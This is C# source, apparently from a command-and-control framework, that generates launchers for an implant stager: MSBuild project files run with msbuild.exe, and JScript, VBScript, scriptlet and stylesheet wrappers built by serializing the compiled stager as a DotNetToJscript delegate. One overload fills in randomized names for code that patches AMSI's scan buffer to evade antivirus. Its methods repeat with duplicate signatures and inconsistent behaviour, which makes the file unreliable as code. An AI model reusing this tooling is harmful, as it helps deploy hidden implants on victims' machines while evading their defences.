        /// <summary>
        /// Renders the MSBuild project template for a pre-compiled stager and returns the
        /// launch command. The rendered project is stored in DiskCode; the Base64 form of
        /// <paramref name="StagerAssembly"/> is stored in Base64ILByteString.
        /// </summary>
        /// <param name="StagerCode">Stager source, stored unchanged in StagerCode.</param>
        /// <param name="StagerAssembly">Compiled stager bytes; Base64-encoded into the template.</param>
        /// <param name="grunt">Grunt the launcher is generated for (not read by this overload).</param>
        /// <param name="template">Implant template whose Name becomes the project file name in the launch command.</param>
        /// <returns>The launcher command line, also stored in LauncherString.</returns>
        public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template)
        {
            this.StagerCode         = StagerCode;
            this.Base64ILByteString = Convert.ToBase64String(StagerAssembly);

            // Placeholder -> value pairs, applied to the template in this exact order. The second
            // group maps the obfuscation placeholders to the per-instance random_var_* identifiers.
            (string Placeholder, string Value)[] substitutions =
            {
                ("{{GRUNT_IL_BYTE_STRING}}", this.Base64ILByteString),
                ("{{TARGET_NAME}}",          this.TargetName),
                ("{{TASK_NAME}}",            this.TaskName),

                ("{{PATCH_AMSI}}",           this.random_var_patchAmsi),
                ("{{AMSI}}",                 this.random_var_amsi),
                ("{{MEMORY_STREAM}}",        this.random_var_outputMemoryStream),
                ("{{DEFLATE_STREAM}}",       this.random_var_deflateStream),
                ("{{BYTE_ARRAY}}",           this.random_var_byteArray),
                ("{{READ}}",                 this.random_var_read),
                ("{{LIB}}",                  this.random_var_lib),
                ("{{AMSI_DLL_0}}",           this.random_var_amsi_dll[0]),
                ("{{AMSI_DLL_1}}",           this.random_var_amsi_dll[1]),
                ("{{AMSI_SCAN_BUFF_0}}",     this.random_var_amsiScanBuffer[0]),
                ("{{AMSI_SCAN_BUFF_1}}",     this.random_var_amsiScanBuffer[1]),
                ("{{AMSI_SCAN_BUFF_2}}",     this.random_var_amsiScanBuffer[2]),
                ("{{ASSEMBLY_BUFFER}}",      this.random_var_assemblyBuffer),
            };

            // Accumulate in a local and publish once; order is preserved so a substituted value that
            // itself contains a later placeholder is handled exactly as the sequential Replace chain did.
            string rendered = XMLTemplate;
            foreach (var (placeholder, value) in substitutions)
            {
                rendered = rendered.Replace(placeholder, value);
            }
            this.DiskCode = rendered;

            this.LauncherString = $"msbuild.exe {template.Name}.xml";
            return this.LauncherString;
        }
        /// <summary>
        /// Renders the MSBuild project template for the supplied listener/grunt/profile and
        /// returns the launch command. Stager source and its compiled Base64 form are stored in
        /// StagerCode / Base64ILByteString; the rendered project is stored in DiskCode.
        /// </summary>
        /// <param name="listener">Listener that supplies and compiles the stager code.</param>
        /// <param name="grunt">Grunt the stager is generated for.</param>
        /// <param name="profile">HTTP profile handed through to the listener.</param>
        /// <returns>The launcher command line, also stored in LauncherString.</returns>
        public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile)
        {
            this.StagerCode = listener.GetGruntStagerCode(grunt, profile);

            // Compiled with the "true" compile flag of this overload (the sibling script-based
            // overload passes false); the meaning of that flag is defined by the listener.
            string ilBase64 = listener.CompileGruntStagerCode(grunt, profile, this.OutputKind, true);
            this.Base64ILByteString = ilBase64;

            this.DiskCode = XMLTemplate
                .Replace("{{GRUNT_IL_BYTE_STRING}}", ilBase64)
                .Replace("{{TARGET_NAME}}", this.TargetName)
                .Replace("{{TASK_NAME}}", this.TaskName);

            // NOTE(review): the launch command names a fixed "file.xml" rather than the rendered
            // template's own name, unlike the ImplantTemplate-based overload.
            const string launcherCommand = "msbuild.exe file.xml";
            this.LauncherString = launcherCommand;
            return this.LauncherString;
        }
        /// <summary>
        /// Renders the MSBuild project template for a pre-compiled stager and returns the
        /// launch command. The compiled bytes are Base64-encoded into Base64ILByteString and
        /// the rendered project is stored in DiskCode.
        /// </summary>
        /// <param name="StagerCode">Stager source, stored unchanged in StagerCode.</param>
        /// <param name="StagerAssembly">Compiled stager bytes; Base64-encoded into the template.</param>
        /// <param name="grunt">Grunt the launcher is generated for (not read by this overload).</param>
        /// <param name="template">Implant template (not read by this overload).</param>
        /// <returns>The launcher command line, also stored in LauncherString.</returns>
        public override string GetLauncher(string StagerCode, byte[] StagerAssembly, Grunt grunt, ImplantTemplate template)
        {
            string encodedAssembly = Convert.ToBase64String(StagerAssembly);

            this.StagerCode         = StagerCode;
            this.Base64ILByteString = encodedAssembly;

            // Placeholders are substituted in the same order as the original sequential Replace chain.
            string project = XMLTemplate.Replace("{{GRUNT_IL_BYTE_STRING}}", encodedAssembly);
            project = project.Replace("{{TARGET_NAME}}", this.TargetName);
            project = project.Replace("{{TASK_NAME}}", this.TaskName);
            this.DiskCode = project;

            // NOTE(review): the launch command uses a fixed "file.xml" and ignores template.Name.
            this.LauncherString = "msbuild.exe file.xml";
            return this.LauncherString;
        }
        /// <summary>
        /// Renders the script-based launcher (JScript or VBScript, optionally wrapped by the
        /// tagged-script, scriptlet or stylesheet template) for the supplied listener/grunt/profile,
        /// stores the result in DiskCode and returns whatever GetLauncher(string) produces for it.
        /// </summary>
        /// <param name="listener">Listener that supplies and compiles the stager code.</param>
        /// <param name="grunt">Grunt the stager is generated for.</param>
        /// <param name="profile">HTTP profile handed through to the listener.</param>
        /// <returns>The result of GetLauncher(string) for the rendered DiskCode.</returns>
        public override string GetLauncher(Listener listener, Grunt grunt, HttpProfile profile)
        {
            this.StagerCode         = listener.GetGruntStagerCode(grunt, profile);
            this.Base64ILByteString = listener.CompileGruntStagerCode(grunt, profile, this.OutputKind, false);

            // Credit DotNetToJscript (tyranid - James Forshaw)
            // The compiled stager bytes are spliced between two fixed Base64-encoded fragments
            // (FrontBinaryFormattedDelegate / EndBinaryFormattedDelegate) to form one byte array.
            byte[] serializedDelegate = Convert.FromBase64String(FrontBinaryFormattedDelegate).Concat(Convert.FromBase64String(this.Base64ILByteString)).Concat(Convert.FromBase64String(EndBinaryFormattedDelegate)).ToArray();
            int    ofs = serializedDelegate.Length % 3;

            // Grow the array (Array.Resize zero-fills the new tail) to a multiple of 3 bytes so the
            // Base64 text produced below contains no '=' padding characters.
            if (ofs != 0)
            {
                int length = serializedDelegate.Length + (3 - ofs);
                Array.Resize(ref serializedDelegate, length);
            }
            string        base64Delegate = Convert.ToBase64String(serializedDelegate);
            int           lineLength     = 80;
            List <String> splitString    = new List <String>();

            // Cut the Base64 text into 80-character chunks; each language re-joins them below with
            // its own line-continuation syntax.
            for (int i = 0; i < base64Delegate.Length; i += lineLength)
            {
                splitString.Add(base64Delegate.Substring(i, Math.Min(lineLength, base64Delegate.Length - i)));
            }

            // NOTE(review): if ScriptLanguage is neither JScript nor VBScript, both of these stay
            // empty and the wrapper templates below are rendered with an empty script; nothing
            // reports the unsupported value.
            string language = "";
            string code     = "";

            if (this.ScriptLanguage == ScriptingLanguage.JScript)
            {
                // Chunks become a `"..." +` / newline / `"..."` concatenation inside the template.
                // Template line endings are normalised from the host's Environment.NewLine to CRLF first.
                string DelegateBlock = String.Join("\"+\r\n\"", splitString.ToArray());
                code     = JScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock);
                language = "JScript";
            }
            else if (this.ScriptLanguage == ScriptingLanguage.VBScript)
            {
                // VBScript accumulates the chunks as successive `s = s & "..."` statements.
                string DelegateBlock = String.Join("\"\r\ns = s & \"", splitString.ToArray());
                code = VBScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_GRUNT_IL_BYTE_STRING}}", DelegateBlock);
                if (this.ScriptType == ScriptletType.Stylesheet)
                {
                    // Inside a stylesheet the VBScript body is wrapped in CDATA so it is not parsed as XML.
                    code = "<![CDATA[\r\n" + code + "\r\n]]>";
                }
                language = "VBScript";
            }

            // ScriptType selects the wrapper: Plain uses the bare script; TaggedScript and Scriptlet
            // go through TaggedScriptTemplate (Scriptlet additionally wraps that in
            // ScriptletCodeTemplate with ProgId); Stylesheet uses StylesheetCodeTemplate.
            if (this.ScriptType == ScriptletType.Plain)
            {
                this.DiskCode = code;
            }
            else if (this.ScriptType == ScriptletType.Scriptlet || this.ScriptType == ScriptletType.TaggedScript)
            {
                string TaggedScript = TaggedScriptTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language);
                TaggedScript = TaggedScript.Replace("{{REPLACE_SCRIPT}}", code);
                if (this.ScriptType == ScriptletType.TaggedScript)
                {
                    this.DiskCode = TaggedScript;
                }
                else
                {
                    this.DiskCode = ScriptletCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_TAGGED_SCRIPT}}", TaggedScript).Replace("{{REPLACE_PROGID}}", this.ProgId);
                }
            }
            else if (this.ScriptType == ScriptletType.Stylesheet)
            {
                this.DiskCode = StylesheetCodeTemplate.Replace(Environment.NewLine, "\r\n").Replace("{{REPLACE_SCRIPT_LANGUAGE}}", language);
                this.DiskCode = DiskCode.Replace("{{REPLACE_SCRIPT}}", code);
            }

            // NOTE(review): only Net35 and Net40 are handled; any other DotNetFrameworkVersion
            // leaves the {{REPLACE_VERSION_SETTER}} placeholder unreplaced in DiskCode.
            if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net35)
            {
                this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", "");
            }
            else if (this.DotNetFrameworkVersion == Common.DotNetVersion.Net40)
            {
                this.DiskCode = this.DiskCode.Replace("{{REPLACE_VERSION_SETTER}}", JScriptNet40VersionSetter);
            }
            // The launch command itself comes from the single-argument overload (defined outside this block).
            return(GetLauncher(this.DiskCode));
        }